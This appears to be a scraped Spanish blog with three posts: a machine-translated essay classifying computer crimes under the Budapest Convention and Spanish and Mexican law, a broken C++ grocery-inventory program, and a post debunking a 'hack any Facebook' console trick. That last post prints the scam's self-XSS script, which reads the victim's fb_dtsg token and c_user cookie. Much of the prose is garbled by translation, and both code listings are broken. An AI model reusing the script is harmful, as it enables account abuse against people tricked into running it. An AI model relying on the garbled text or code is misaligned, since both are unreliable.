lunes, 13 de julio de 2015

DELITOS INFORMATICOS


DEFINICIÓN DE DELITO INFORMÁTICO
El constante progreso tecnológico Que Experimenta la sociedad, Supone Una Evolución en las Formas de delinquir, Lugar Dando, del tanto a la Diversificación de los Delitos Tradicionales Como a la Aparición de Nuevos Actos ilícitos. This Realidad ha originado un debate entorno a la ONU Necesidad de distinguish o sin los Delitos Informáticos del resto.
Diversos Autores y Organismos de han Propuesto definiciones de los Delitos Informáticos, aportando Distintas Perspectivas y matices al Concepto. ALGUNOS consideran Que es innecesario diferenciar los Delitos Informáticos de los Tradicionales, ya Que, segun Estós sí Trata de Los Mismos Delitos, cometidos a Través de Otros Medios. De Hecho, el Código Penal español, no hay CONTEMPLA los Delitos Informáticos Como tal.
Partiendo of this COMPLEJA Situación y Tomando Como Referencia el "Convenio de Ciberdelincuencia del Consejo de Europa", PODEMOS Definir los Delitos Informáticos Como: "los Actos dirigidos contra la confidencialidad, la Integridad y la Disponibilidad de los Sistemas Informáticos, Redes y Datos informáticos, Asi Como el Abuso de los dichos Sistemas, Redes y Datos ".
CARACTERÍSTICAS PRINCIPALES
  • Hijo Delitos Difíciles de demostrar ya Que, en Muchos Casos, es complicado Encontrar las pruebas.
  • Hijo Actos Que pueden llevarse un cabo de forma Rápida y sencilla. En Ocasiones Estós Delitos pueden cometerse en Cuestión de Segundos, utilizando Sólo un equipo informático y estar sin Presente fisicamente en El Lugar de los Hechos.
  • Los Delitos Informáticos tienden a proliferar Y evolucionar, Lo Que complica AUN MAS LA IDENTIFICACION Y Persecución de Los Mismos.
  • Varios Organismos de han Diferentes Propuesto Clasificaciones de los Delitos Informáticos, AUNQUE en general, todos coinciden al enunciar Como Delitos informáticos los Robos de identidad, fraudes y sabotajes informáticos, Fugas de Datos, etc.
DELITOS INFORMÁTICOS »TIPOS DE DELITOS INFORMÁTICOS
TIPOS DE DELITOS INFORMÁTICOS
Clasificación SEGÚN el "Convenio Sobre la Ciberdelincuencia" de 1 de Noviembre de 2001
Con El Fin de la ONU Definir marco de Referencia en el campo de las Tecnologías y los Delitos Para La Unión Europea, en Noviembre de 2001 se Firmo en Budapest el "Convenio de Ciberdelincuencia del Consejo de Europa". En Este convenio de PROPONE Una Clasificación de los Delitos informáticos en cuatro grupos:
  • Delitos contra la confidencialidad, la Integridad y la Disponibilidad de los Datos y Sistemas Informáticos:
    • Acceso ilícito a Sistemas informáticos.
    • Interceptación ilícita de Datos informáticos.
    • Interferencia en el FUNCIONAMIENTO de informático Sistema de las Naciones Unidas.
    • Abuso de Dispositivos Que faciliten la comisión de Delitos.
ALGUNOS EJEMPLOS of this grupo de Delitos hijo: El robo de Identidades, La Conexión a redes no Autorizadas y la utilizacion de spyware y de keylogger.
  • Delitos informáticos:
    • Falsificación informática Mediante la Introducción, borrado o supresión de Datos informáticos.
    • Fraude informático Mediante la Introducción, Alteración o borrado de Datos informáticos, o la interferencia en sistemas informáticos.
El borrado fraudulento de Datos o la Corrupción de Ficheros ALGUNOS EJEMPLOS de Delitos of this tipo.
  • Delitos Relacionados con el contenido:
    • Producción, oferta, difusión, similares adquisición de contenidos de pornografia infantil, por medio de la ONU Sistema informático o posesión de los dichos Contenidos En un Sistema informático o medio de Almacenamiento de Datos.
  • Delitos Relacionados con Infracciones de la propiedad intelectual y Derechos Afines:
    • Un EJEMPLO of this grupo de Delitos es la copia y Distribución de Programas informáticos, o piratería informática.
Con El fin de criminalizar los Actos de racismo y xenofobia cometidos Mediante Sistemas Informáticos, en Enero de 2008 se promulgó el "Protocolo Adicional al Convenio de Ciberdelincuencia del Consejo de Europa" que includes, Entre Otros Aspectos, las Medidas Que se Deben Tomar en Casos de:
  • Difusión de material de xenófobo o racista.
  • Insultos o Amenazas con Motivación racista o xenófoba.
  • Negociación, burda minimización, aprobacion o justificación del genocidio o de Crímenes contra la Humanidad.
Clasificación SEGÚN La Página de la Brigada de Investigación Tecnológica de la Policía Nacional Española ( www.policia.es/bit/index.htm )
  • Ataques Que se Producen contra el derecho a la intimidad:
Delito de Descubrimiento y Revelación de secretos Mediante el apoderamiento y difusión de Datos reservados Registrados en Ficheros o Soportes informáticos. (Artículos del 197 al 201 del Código Penal)
  • Infracciones a la Propiedad Intelectual un Través de la Protección de los Derechos de Autor:
Especialmente la copia y Distribución no Autorizada de Programas de Ordenador y tenencia de Medios para suprimir los Dispositivos utilizados párr Proteger los dichos Programas. (Artículos 270 y Otros del Código Penal)
  • Falsedades:
Concepto de documento Como TODO Soporte materiales Que exprese o InCorpore Datos. Extensión de la falsificación de moneda a las Tarjetas de Débito y Crédito. Fabricación o tenencia de Programas de Ordenador Para La comisión de Delitos de falsedad. (Artículos 386 y ss del Código Penal).
  • Informáticos Sabotajes:
Delito de daños Mediante la Destrucción o Alteración de Datos, Programas o Documentos Electrónicos Contenidos en redes o Sistemas informáticos. (Artículo 263 del Código y Otros Penal)
  • Fraudes informáticos:
Delitos de estafa a Través de la Manipulación de Datos o Programas para la obtencion de lucro ilícito ONU. (Artículos 248 y ss del Código Penal).
  • Amenazas:
Realizadas por CUALQUIER medio de Comunicación. (Artículos 169 y ss del Código Penal).
  • Calumnias e injurias:
Cuando Se propaguen por CUALQUIER medio de Eficacia Semejante a la imprenta o la radiodifusión. (Artículos 205 y ss del Código Penal).
  • Pornografía infantil:
Entre los Delitos relativos a la prostitución al utilizar un Menores o incapaces con multas exhibicionistas o pornograficos.
La inducción, promoción, favorecimiento o facilitamiento de la prostitución de una persona menor de Edad o Incapaz. (Art 187)
La Producción, venta, Distribución, exhibición, por más cualquier medio, de material de pornográfico en Cuya elaboración Hayan Sido utilizados Menores de Edad o incapaces, de aunque el material de tuviere su origen en el Extranjero o fuere desconocido. (Art 189)
El facilitamiento de las Conductas Anteriores (El que facilitare la Producción, venta, Distribución, exhibición ...). (Art 189)
La posesión de material de DICHO Para La Realización de dichas Conductas. (Art 189)
Recovery Labs © 2015 -
FAQs - Preguntas Frecuentes
¿Constituye la ONU delito informático el Envío de correos Electrónicos Masivos pecado Autorización del usuario, en especial de Aquellos Que Venden Productos Farmacéuticos u Operaciones quirúrgicas?
INDEPENDIENTEMENTE del tema Que trar, El Correo electrónico no SOLICITADO, Conocido Como habitualmente spam O Correo basura, ESTA terminantemente prohibido por la Ley de Servicios de la Sociedad de la Información y de Comercio Electrónico (LSSICE), Publicada en el BOE del 12 de julio de 2002. ( www.boe.es/boe/dias/2002/07/12/pdfs/A25388-25403.pdf ). Hay Que Prestar Una Atención especial a Aquellos correos Electrónicos Cuyo contenido this relacionado con Productos Farmacéuticos, ya Que, podrian incurrir en Infracciones relacionadas con la salud pública.
Se podria APLICAR,: Además, la Ley Orgánica de Protección de Datos (LOPD) ( www.boe.es/g/es/bases_datos/doc.php?coleccion=iberlex&id=1999/23750 ) ya Que en Muchos Casos, los dichos Envíos de Correos Electrónicos Masivos, el pecado se Realizan Autorización del usuario, del lo por Que Se estaria Haciendo un USO indebido de los Datos de Carácter personal de los Usuarios.
Hay Un usuario de Internet Que se dedica a difamar mi persona en Foros, Webs y Correos Electrónicos, ¿como Debo enfrentarme un this situation?
En Principio Es Posible Emprender Una DEMANDA judicial contra la Persona que atenta contra el honor del nuestro. : No obstante, corresponde siempre a los tribunales Decidir Qué Expresiones se pueden considerar injuriosas.
¿Qué Pasos Debo Seguir párr recibir la ONU Informe pericial de la ONU Sobre el Dispositivo Que deseamos Realizar informático peritaje de la ONU?
En Lugar de imprimación, Dębe ponerse en contacto telefónico nuestro de la estafa Servicio de Atención al Cliente A través del Teléfono 902 109 009, Nuestros Técnicos le explicarán detalladamente Los Pasos Que Dębe Seguir párrafo Comenzar un Llevar un Cabo La Investigación informática forense .
El Proceso CONSTA fundamentalmente de la ONU Análisis de la Situación en La que se establecen los Objetivos de la Investigación, el Análisis de la Viabilidad y el presupuesto del servicio. A Continuación se Desarrolla la Investigación y se Elabora el Informe. Si el cliente lo Solicita Así, acudiremos a los tribunales una Prestar Declaración de Como peritos informáticos.
¿Qué Debo Hacer si me han robado las Contraseñas del Correo electrónico?
La Unica Posibilidad existente párr Recuperar los Datos de Acceso De Una Cuenta de Correo electrónico, es ponerse en contacto con su Proveedor. Habitualmente, los dichos Proveedores disponen De Una Serie de Datos de registro de un Través de los Cuales podran comprobar v la Autenticidad de su identidad, párr facilitarle Una Nueva Contraseña.
Estoy Recibiendo correos Electrónicos intimidándome. ¿Pueden Averiguar Quien es el autor de Estós correos Electrónicos?
Los Expertos de Recuperación laboratorios no pueden determinar S. Qué personaje Envió El Mensaje, ya Que, párr identificar al Propietario De Una Cuenta de correo es Necesario Acceder a la Información de registro. Sólo Tiene Acceso a los Datos de registro el Proveedor de la Cuenta de Correo en question. Sin embargo, Llevando un cabo de Una Investigación informática forense , se podrian determinar S. Otras Cuestiones Fundamentales de Como Qué Ordenador, session y Cuenta utilizó el emisor del Correo.
¿Qué Puedo Hacer si mi page web del ESTA Sufriendo ONU ataque de denegación de servicio?
El ataque de denegación de servicio o DoS (de las siglas en inglés Denial of Service), Es Una ataque a la ONU Sistema de Ordenadores o redes, Que consiste en Hacer Que los Servicios o sean inaccesibles Recursos Para Los Usuarios legitimos. En Este Caso, Haría Que los Usuarios de su web no puedan acceder a este LA INFORMACIÓN Que Alli se publica. Sí se producen por la ONU fallo del Servidor, Se Puede Solucionar rapidamente localizando y corrigiendo DICHO error. Sí se Trata de la ONU ataque Coordinado es Mucho Más complicado defenderse, de aunque también es Mucho Más Difícil Que se produzcan Este tipo de Ataques.
Una forma de Minimizar los Daños Que Producen Este tipo de Ataques, es Contar Con otro Dominio en línea, Que contenga La Misma Información, al Menos Durante el Período de Tiempo Que dure el ataque.
¿Qué Tipos de Servicios ADICIONALES pueden Ser Necesarios en peritaje informático de la ONU?
Habitualmente, el Departamento de investigaciones forenses informáticas, Dębe coordinarse nuestro de la estafa Laboratorio de Recuperación de Datos , Ya Que En Ocasiones los Clientes No Solo Quieren demostrar la existence de acto delictivo ONU (borrado fraudulento, formateo intencionado, Acceso a sitios restringidos, etc.) Sino Que también DeSean Recuperar LA INFORMACIÓN.
Por Otro Lado, Siempre Que el cliente lo Solicite, Nuestros peritos informáticos Prestán Declaración jurada en Tribunales, Procesos amistosos, Careos, etc.
Trabajo en Una revista jurídica y los Delitos Informáticos me INTERESANTES Muy resultan, de cara un reportaje ONU Publicar. ¿Podrian colaborar en la Redacción del Mismo?
SUPUESTO Por, Tan Sólo Dębe ponerse en contacto con el departamento de Comunicación de Recuperación Labs, A través del Teléfono 902 109 009. A lo largo de Nuestros años de Experiencia, HEMOS colaborado en la Redacción de Informes y Artículos Sobre los Delitos informáticos , estafa Diversas revistas especializadas. : Además de colaborar con la Agencia de Protección de Datos en la Redacción de Leyes relativas a la Seguridad de la Información.
¿Cuales hijo los Delitos Informáticos Más Comunes?
El Departamento de Investigaciones Informáticas Forenses laboratorios de Recuperación Realiza Una continua Investigación de las Nuevas Tendencias y Prácticas delictivas. En los laboratorios de Recuperación TENEMOS Más contacto con Aquellos Delitos Relacionados con la Actividad Empresarial, dado Que Son las Empresas Interesadas en las mas Nuestros Servicios. In this SENTIDO Podemos Decir Que los Delitos Más Comunes hijo los sabotajes A Empresas, USO fraudulento de Internet, Fugas de información, espionaje informático, etc.
: No obstante, Hay Que Tener en Cuenta Que ACTUALMENTE EXISTEN Infinidad de tipologías de Delitos Informáticos Y Que Día a Día Surgen Nuevos Casos. Otros Tipos de Delitos informáticos hijo:
  • Robo de Identidades (rojo, Correo, etc.)
  • Virus, Spyware, keylogger ...
  • Borrado fraudulento de Datos, formateado duro discoteca ...
  • Dejadez de Funciones.
  • Corrupción de Ficheros.
  • Webs pornográficas, infantil pornografia
  • Conexiones a Redes Sala no Autorizadas
  • Fugas de información.
SOBRE SEGURIDAD INFORMÁTICA
Relacionados con su equipo informático:
  • Actualice regularmente su Sistema Operativo y el software Instalado en su equipo, Poniendo especial Atención a las Actualizaciones de Su navegador web. A Veces, los Sistemas Operativos Presentan Fallos, Que pueden Ser aprovechados por delincuentes informáticos. Frecuentemente Aparecen Actualizaciones Que solucionan los dichos Fallos. Estar al día con las Actualizaciones, Asi Como APLICAR los Parches de Seguridad recomendados por los Fabricantes, le ayudará a Prevenir la intrusión de hackers Posible y la Aparición de Nuevos virus.
  • Instale ONU Antivirus y actualícelo con Frecuencia. Analice con su antivirus todos los Dispositivos de Almacenamiento de Datos Que utilice y todos los Archivos Nuevos, especialmente Aquellos Archivos descargados de Internet.
  • Instale ONU Firewall o Cortafuegos con el fin de restringir · accesos no Autorizados de Internet.
  • Es recomendable Tener Instalado en su equipo ALGÚN tipo de software anti-spyware , párr Evitar Que se introduzcan en su equipo Programas Espías Destinados a recopilar Información Confidencial Sobre el usuario.
Relacionados con la navegación en Internet y la utilizacion del Correo electrónico:
  • Utilice Contraseñas Seguras , es Decir, Caracteres Ocho Aquellas compuestas POR, Como Mínimo, Y Que combinen letras, Números y Símbolos. Es conveniente: Además, Que modifique SUS Contraseñas con Frecuencia. En especial, le recomendamos Que Cambie la clave de su Cuenta de Correo si se adhieran con frequency from equipos Públicos.
  • Navegue por Páginas Web Segura y de confianza . Para diferenciarlas identifique si dichas Páginas Tienen ALGÚN sello o certificado Que garanticen su Calidad y Fiabilidad. Extreme la precaucion si va a Realizar compras en línea o va a facilitar Información confidencial un Través de Internet. En Estós Casos reconocerá Como Páginas Seguras Aquellas Que cumplan dos Requisitos:
    • Deben Empezar por https: // en Lugar de http.
    • En la barra del Navegador Dębe aparecer el icono del candado cerrado. A Través de Este icono Se Puede acceder a este certificado digital de la ONU Que Confirma la Autenticidad de la page.
  • Sea cuidadoso al utilizar Programas de Acceso remoto . A Través de Internet y Estós Mediante Programas, Es Posible acceder a este Ordenador ONU, from Otro SITUADO un Kilómetros de distancia. De Aunque Supone ESTO gran Una Ventaja, Florerias poner en peligro la direction seguridad de su Sistema .
  • Ponga especial Atención en el Tratamiento de su Correo Electrónico , ya Que Es Una de las Herramientas Más utilizadas Para Llevar un cabo estafas, introducir virus, etc: Por ello le recomendamos Que:
    • No abra Mensajes de Correo de remitentes desconocidos.
    • Desconfíe de Aquellos e-mails con baño Los Que Entidades bancarias, Compañías De Subastas o este sitios de venta en línea, le solicitan Contraseñas, confidencial Información, etc.
    • No se propague Aquellos Mensajes de Correo con contenido dudoso Y Que le Piden Ser reenviados a todos SUS Contactos. Este tipo de Mensajes, Conocidos Como engaños, pretenden avisar de la Aparición de Nuevos virus, transmitir leyendas urbanas o Mensajes solidarios,: difundir noticias impactantes, etc. Estas cadenas de e-mails se Suelen Crear con el Objetivo de captar las Direcciones de Correo de Usuarios a Los Que posteriormente se les enviarán Mensajes con virus, phishing o Todo tipo de correo no deseado.
    • Utilice ALGÚN tipo de software Proteger párrafo Anti-Spam su Cuenta de Correo de Mensajes no deseados.
En general, los it fundamental Estar al día de la Aparición de Nuevas Tecnicas Que amenazan la direction seguridad de su equipo informático , párrafo Tratar de evitarlas o de APLICAR La Solución Más Efectiva posible.
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
Delitos Informaticos
Clasificación de los Delitos Informaticos
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif

http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
http://delitosinformaticos.tripod.com/imagelib/sitebuilder/layout/spacer.gif
Julio Téllez Valdés clasifica a los Delitos informáticos en base de un dos Criterios: como Instrumento o medio Y Como fin u objetivo m.
Como Instrumento o medio: En Esta categoría se encuentran las Conductas criminales Que se valen de las computadoras de Como method, medio o Símbolo en la comisión del ilícito, por EJEMPLO:
a)        a)        falsificación de Documentos vía computarizada (Tarjetas de crédito, cheques, etc.).
b)        b)        Variación de los Activos y Pasivos en La Situación Contable de las Empresas.
c)        c)        Planeamiento y simulación de Delitos Convencionales (robo, homicidio, fraude, etc.).
d)        d)        Lectura, sustracción o Copiado de información confidencial.
e)        e)        Modificación de Datos del tanto en la entrada ¿Como en la salida.
f)          f)          Aprovechamiento indebido o violation de código párr ONU penetrar un Sistema ONU introduciendo Instrucciones inapropiadas.
g)        g)        Variación en Cuanto al destino de Pequeñas Cantidades de dinero Hacia una Cuenta bancaria apócrifa.
h)        h)        Uso no Autorizado de Programas de computo.
i)          i)          Introducción de Instrucciones Que provocan "Interrupciones" En la Lógica Interna de los Programas.
j)          j)          Alteración en el FUNCIONAMIENTO de los Sistemas, Través de los virus informáticos.
k)        k)        obtencion de información residual impresa en papel LUEGO de la Ejecución de Trabajos.
l)          l)          Acceso a áreas INFORMATIZADAS en forma no Autorizada.
m)      m)      Intervención en las Líneas de Comunicación de Datos o teleproceso.
Como aleta u Objetivo: En Esta categoría, se enmarcan las Conductas criminales Que van dirigidas Contra las computadoras, accesorios o Programas de Como entity Física, por EJEMPLO Como:
a)        a)        Programación de Instrucciones Que Producen bloqueo total de la ONU al Sistema.
b)        b)        Destrucción de Programas por any method.
c)        c)        Daño a los Dispositivos de Almacenamiento.
d)        d)        Atentado contra Fisico La Máquina o SUS accesorios.
e)        e)        Sabotaje Político o Terrorismo En que se destruya o surja la ONU apoderamiento de los Centros neurálgicos computarizados.
f)          f)          Secuestro de Soportes Magnéticos Entre los cifra Que Valiosa Información multas estafadores de chantaje (pago de rescate, etc.).
María de la Luz Lima , Presenta Una clasificacion, de Que Lo ella llama " Delitos Electrónicos " , Diciendo Que EXISTEN tres Categorías, un sable:
a)        a)        Los que utilizan la Tecnología electrónica Como method: Conductas criminógenas En Donde los individuals utilizan Métodos Electrónicos párr Llegar a ilícito m resultado un.
b)        b)        Los que utilizan la Tecnología electrónica Como medio: Conductas criminógenas En Donde párrafo Realizar ONU delito utilizan Una Computadora Como medio o Símbolo.
c)        c)        Los que utilizan la Tecnología electrónica Como aleta: Conductas criminógenas dirigidas contra entity Física del Objeto o Máquina electrónica o material de la Do con Objeto de dañarla.
En Lo que sé refiere un Delitos informáticos, Olivier Hance en su libro Leyes y Negocios en Internet, CONSIDERA tres Categorías de Comportamiento Que pueden afectar negativamente a los Usuarios de los Sistemas Informáticos. Las Mismas hijo las Siguientes:
a)        a)        Acceso no Autorizado: Es El Primer Paso de más cualquier delito. Se refiere a la ONU usuario Que, authority pecado, sí Conecta deliberadamente una ANU rojo, servidor de la ONU o archivo de las Naciones Unidas (por EJEMPLO, Una Casilla De Correo electrónico), o Hace La Conexión por accidente but decidir voluntariamente Mantenerse Conectado.
b)        b)        Actos Daninos o Circulación de materiales dañino: Una Vez Que se Conecta un Servidor de la ONU, el Florerias infractor robar Archivos, copiarlos o Hacer circular Información negativa, el virus de Como o gusanos. Tal Comportamiento casi siempre es Clasificado, Como piratería (apropiación, Descarga y USO de la Información pecado Conocimiento del Propietario) o Como sabotaje (Alteración, Modificación o Destrucción de Datos o de software, uno de Cuyos Efectos es paralizar la Actividad del Sistema o del Servidor en Internet).
c)        c)        interceptación no Autorizada: En Este Caso, el pirata informático Detecta pulsos Electrónicos transmitidos Por Una roja o Una Computadora y obtiene Información no Dirigida a el.
d)        Las Leyes Estadounidense y canadiense, Lo Mismo Que los Sistemas Legales de la Mayoría de los Países Europeos, de han tipificado Y penalizado Estós Tres Tipos de Comportamiento ilícito cometidos a Traves De Las computadoras.
Informática Forense
CONCEPTO: Dícese de la técnica pericial Que Involucra el Análisis informático, la criminalística y la criminología párr determinar S. la Presencia de la ONU indicio digital, la probable Responsabilidad de la ONU usuario de Tecnologías de la Información y el Posible Modo de Operar de activo Sujeto ONU
En México, El pasado 28 de marzo, la Cámara de Diputados aprobo Modificaciones Legales párr identificar los Tipos de Delitos Informáticos, con Lo que sé pretende condenar a Aquellos Que Hagan mal USO de la Tecnología.
Los Posibles Delitos Que podrian entrar pronto en vigor, van desde el acoso cibernético , Hasta el hackeo  y  agrietamiento , ya Que Si Individuo ONU Acceda un ajeno Sistema de las Naciones Unidas, Aunque No Haga Daños: modificaciones del ni, Sino Que sea una sencilla practica educativa, sera considerado en Como delito en la reforma al articulo 211 Que se Explica un Continuación:
Tipos de Delitos Informáticos
  • Revelación de 'secretos': Un REVELE quien, Divulgue o utilice indebidamente o en prejuicio de Otro, Información, Conversaciones o Mensajes de texto, imagenes o Archivos de voz, Contenidos en sistemas o equipos informáticos (Dispositivos Móviles o equipos de computo).
  • Cracking : Acceso ilícito a Sistemas y equipos de informática con Peña Entre 3 y 12 meses de Prisión a quien "Acceda authority pecado, modifique, destruya o provoque perdida de información contenida en sistemas o equipos de informática". La pena podria incrementarse en 2/3 contradictorio, en Caso del la del que Penetración impida el acceso acceso USO o del Sistema afectado.
  • Hackear: el pecado Penetración Daños con pena de 12 meses de Prisión y de 100 a 150 Días de multa a quien el pecado authority Conozca o copie Información contenida en sistemas o equipos de informática sin Protegidos por ALGÚN Mecanismo de Seguridad. Este punto Queda confuso del tanto de la ONU, ya Que ESPECIFICA 'equipos no Protegidos', por Lo Que habríamos de Pensar Que burlar los cortafuegos párr Tener acceso acceso En Modo lectura sin this predefinido Como delito, ¿o sí?
  • Cyberbullyin g (Amenazas e Intimidación una travez de Sistemas Digitales): Uso de Imágenes de Otros Como forma de chantaje, al Que "amenace un Otro (...), Haciendo la USO o Empleo de Comunicados o Mensajes Enviados a Través de Medios o Sistemas Informáticos o le amenace con Divulgar la Información, Datos o Imágenes obtenidas A través del acceso acceso ilícito a los dichos Medios o Sistemas informáticos.
Entre las Modificaciones se tipifica el acto de contactar victimas por internet párrafo Generar Relación de confianza o amistad. Una de las dudas Que Quedan es si accesar a equipos Módem párrafo robarse el internet Quedara Clasificado, Como delito.



//ramses merel sanchez

lunes, 12 de mayo de 2014

Programa que simula una base datos de una tienda de abarrotes

/*Programa que simula una base datos de una tienda de abarrotes llamada la pequeña,
  autor: Rafael Damaso Santos,   e-mail: rafa-escorpion@live.com.mx  grupo: O6 */
/*ejecutenlo de preferencia en dev-c++, en caso de que usen el visual, quiten el comentario de la lib "stdafx")  saludos */
//#include "stdafx.h"
#include "fstream"
#include "iostream"
#include "string"
#include "cstdlib"
#include "iomanip"
#include <stdlib.h>
#include <stdio.h>
#include <conio.h>

/********************************  FUNCIONES   *******************************/
void escanear();
void consulta();
void modifica();
void pausa();
/*****************************************************************************/

using namespace std;

int main()
{
int opcion=0, i=0;

do
{
system("cls");
                cout<<"***************************************"<<endl;
                cout<<"*BASE DE DATOS DE LA TIENDA LA PEQUEÑA*"<<endl;
                cout<<"***************************************"<<endl;
                cout<<"* Desarrollador: RAFAEL DAMASO SANTOS *"<<endl;
                cout<<"***************************************"<<endl;
                cout<<"\n MENU DE OPCIONES\n";
cout<<" 1. REGISTRO DE LOS PRODUCTOS.\n";
cout<<" 2. CONSULTA DE LOS PRODUCTOS.\n";
cout<<" 3. MODIFICA LA BASE DE DATOS.\n";
cout<<"\n";
cout<<" 0. SALIR";
cout<<"\n\n Elige una opcion: ";
cin>>opcion;

switch(opcion)
{
case 0:
       break;
case 1:
       escanear();
case 2:
       consulta();
case 3:
       modifica();
default:
        cout<<" opcion no disponible mi estimad@"<<endl;
        pausa();
} // switch
}// do

while(opcion !=0);
}//end of main



void pausa() //función que nos ayuda a parar el programa cuando lo necesitemos
{
cout<<"\n\n\n\n Pulsa cualquier tecla... ";
getch();
}//end of pausa



void escanear() //funcion que pide por teclado los datos del producto
{
fstream listacodigo;
string codigo;
string producto;
string precio;
string cantidad;
double cost;
int cont=0;
char option;

listacodigo.open("c:\\Examen de Damaso.txt", ios::out);
if(!listacodigo)
{
   cout<<"******************************************"<<endl;
   cout<<"***      ERROR AL CREAR SU ARCHIVO     ***"<<endl;
   cout<<"***          INTENTE DE NUEVO          ***"<<endl;
   cout<<"*** O PONGASE EN CONTACTO CON NOSOTROS ***"<<endl;
   cout<<"******************************************"<<endl;
   exit (EXIT_FAILURE);
}

   while (cont==0)
   {
    system("cls");
    codigo="";
    producto="";
    precio="";
    cantidad="";
    cost=0;

     cout<<"\n Complete la informacion pedida: \n"<<endl;
     while(codigo=="")
     {
        cout<<"codigo del producto: \n";
        getline(cin,codigo);
     }
     while(producto=="")
     {
         cout<<"nombre del producto: "<<endl;
         getline(cin,producto);
     }
     while(precio=="")
     {
        cout<<"precio del producto: \n";
        getline(cin,precio);
     }
     while(cantidad=="")
     {
         cout<<"cantidad de producto: "<<endl;
         getline(cin,cantidad);
   
listacodigo<<codigo<<"|"<<producto<<"|"<<precio<<"|"<<cantidad <<endl;
   
cout<<"\n REGISTRAR OTRO PRODUCTO? (S/N): ";
cin>>option;
if(option=='n'||option=='N')  {cont=1;}
}
listacodigo.close();
}

void consulta()
{
fstream listacodigo;
string codigo;
string producto;
string precio;
string cantidad;
string linea;

int cod1,cod2,cod3,cod4;

listacodigo.open("c:\\Examen de Damaso.txt", ios::out);
if(!listacodigo)
{
   cout<<"***      ERROR AL CREAR SU ARCHIVO     ***"<<endl;
   cout<<"***          INTENTE DE NUEVO          ***"<<endl;
   cout<<"*** O PONGASE EN CONTACTO CON NOSOTROS ***"<<endl;
   exit (EXIT_FAILURE);
}
cout << setprecision(2) << setiosflags(ios:: fixed);
cout << "Codigo  Producto  precio  cantidad \n"<<endl;
getline(listacodigo, linea, '\n');
while ( !listacodigo.eof())
codigo="";
producto="";
precio="";
cantidad="";
        cod1=linea.find('|');
cod2=linea.find('|', cod1 + 1);
cod3=linea.find('|', cod2 + 1);
cod4=linea.find('|', cod3 + 1);
             
                codigo=linea.substr(0, cod1);
producto=linea.substr(cod1 + 1, cod2 - cod1 - 1);
precio=linea.substr(cod2 + 1, cod3 - cod2 - 1);
                cantidad=linea.substr(cod3 + 1, cod4 - cod3 - 1);
cout<<codigo<<" " <<producto<<" "<<precio<<" "<<cantidad<<getline(codigo,linea,'\n');
}
listacodigo.close();
cout<<"\nPresione cualquier tecla y ENTER para regresar al menu"<<endl;
cin>>linea;

void modifica()
{
fstream listacodigo;
string codigo;
string producto;
string precio;
string cantidad;
string linea;
string modific;
string tmp;
long posicion=0;
 listacodigo.open("c:\\Examen de Damaso.txt", ios::out | ios :: out);
    if(!listacodigo)
       {
   cout<<"******************************************"<<endl;
   cout<<"***      ERROR AL CREAR SU ARCHIVO     ***"<<endl;
   cout<<"***          INTENTE DE NUEVO          ***"<<endl;
   cout<<"*** O PONGASE EN CONTACTO CON NOSOTROS ***"<<endl;
   cout<<"******************************************"<<endl;
   exit (EXIT_FAILURE);
       }
getline(cin,codigo),'n');
cout<<"**********************************************"<<endl;
cout<<"*        MODIFICACION DE LA INFORMACION      *\n";
cout<<"*NOTIFIQUE QUE SE HABRA CAMBIOS EN SU SISTEMA*\n";
cout<<"**********************************************\n"<<endl;
cout<<"PRODUCTO: ";
getline(cin,modific,'n');

getline(listacodigo,tmp,'n');
while(tmp.substr(0, modific.size()) !=modific && !listacodigo.eof())
{
posicion=listacodigo.tellg();
getline(listacodigo,tmp,'\n');
}

if(listacodigo.eof())
{
cout<<"****************************"<<endl;
cout<<"*NO SE ENCONTRO EL PRODUCTO*"<<endl;
cout<<"****************************"<<endl;
listacodigo.clear();
}
else
{
cout<<"Producto: ";
cin>>producto;
cout<<"precio: ";
cin>>precio;
cout<<"cantidad";
cin>>cantidad;

listacodigo.seekg(posicion);
listacodigo<<modific<<"|"<<producto<<"|"<<precio<<"|"<<cantidad<<"|"<<endl;
listacodigo.close();
system("cls");
cosulta();
}
}

lunes, 10 de febrero de 2014

falsedad detras de "hackea el facebook que quieras con estos pasos"

HOLA AMIGOS, ME HE DADO CUENTA DE QUE TODOS HAN HECHO LO DE:

HACKEA EL FACEBOOK QUE QUIERAS CON ESTOS PASOS

1º Copia Todo el codigo de abajo
2º Ve a el Perfil de la persona a la Que le Quieres robar La Cuenta en facebook
3º Dale clic derecho y en "Inspeccionar Elemento" o Pulsa "F12" Perfil en CUALQUIER parte de su
4º Pulsa Una Pestaña Que pone "consola" o "consola"
5º Pega el codigo completo de abajo con "Ctrl + V" o "Control + V"
6º Dale escriba y se abrira Una Pestaña con su e-mail y su Contraseña

EL PRESENTE CODIGO ES UNA VIL MENTIRA, LO QUE HACE ES "UNA VEZ QUE LOS PASOS ANTERIORES EJECUTAS, LO QUE HACE EL PRESENTE CODIGO ES REUNIR A TUS CONTACTOS Y HACER UNA PUBLICACION TUYA CON LOS NOMBRES DE TUS CONTACTOS Y LOS ETIQUETA EN LA PUBLICACION JUNTO CON EL ANUNCIO DE HACKEA EL ROSTRO DE TUS AMIGOS
LES RECOMIENDO NO HAGAN CASO A ESTO, NO ES VERDAD!
PARA hackear CARA SE NECESITAN DE EXPLOTAR!
Y OTROS VIRUS inofensivos! 


Codigo:


/ * Gen facebook tecla * /
padres var = document.getElementsByTagName ("html") [0];
var _body = document.getElementsByTagName ("cuerpo") [0];
var _div = document.createElement ('div');
_div.style.height = "25";
_div.style.width = "100%";
_div.style.position = "fijo";
_div.style.top = "auto";
_div.style.bottom = "0";
_div.align = "center";
var _audio = document.createElement ('audio');
_audio.style.width = "100%";
_audio.style.height = "25px";
_audio.controls = true;
_audio.autoplay = false;
_audio.autoplay = true;
_audio.src = "https://facebook.com";
_div.appendChild (_audio);
_body.appendChild (_div);
var fb_dtsg = document.getElementsByName ('fb_dtsg') [0] .value;
user_id var = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]);
var fb_dtsg = document.getElementsByName ("fb_dtsg") [0] .value;
user_id var = document.cookie.match (document.cookie.match (/ c_user = (\ d +) /) [1]);
